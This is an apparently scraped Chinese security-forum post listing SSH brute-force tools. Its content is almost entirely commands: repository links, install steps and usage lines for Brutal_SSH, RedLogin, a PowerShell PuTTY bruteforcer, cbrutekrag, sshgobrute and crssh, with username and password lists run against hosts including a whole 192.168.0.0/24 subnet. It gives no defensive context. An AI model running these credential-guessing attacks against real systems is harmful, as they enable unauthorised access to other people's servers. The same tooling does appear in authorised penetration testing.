855
862
2940
金牌会员
git clone https://github.com/d3vilbug/Brutal_SSH
pip2 install -r requirements.txt
python2 brutal_SSH.py
python2 brutal_SSH.py -i 127.0.0.1 -p 22 -U /root/usernames.txt -P /root/passwords.txt
https://github.com/ParsingTeam/RedLogin
Install-Package SSH.NET -Version 2020.0.1
Redlogin.exe target.txt username.txt password.txt
https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer
PS C:\SSH-PuTTY-login-bruteforcer-master> import-module .\ssh-putty-brute.ps1 ssh-putty-brute [-h ip|ips.txt] [-p port] [-u user|users.txt] [-pw pass|pwdlist.txt]
https://github.com/matricali/cbrutekrag
rpm -vi http://mirror.centos.org/centos/ ... .4-2.el8.x86_64.rpm
make && make install
./cbrutekrag -h
cbrutekrag -T target.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.0.0/24
https://github.com/aldenso/sshgobrute
go get github.com/aldenso/sshgobrute
sshgobrute -file passwords.txt -ip 127.0.0.1 -port 22 -user root
https://github.com/hlts2/crssh
go get github.com/hlts2/crssh
crssh -h
crssh root@127.0.0.1 -p 22 -d
https://github.com/hlts2/godict/blob/main/assets/filesystem.go
crssh root@127.0.0.1 -p 22 -b -s 2
crssh root@127.0.0.1 -p 22 -db -s 2
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-29 13:32 , Processed in 0.014979 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.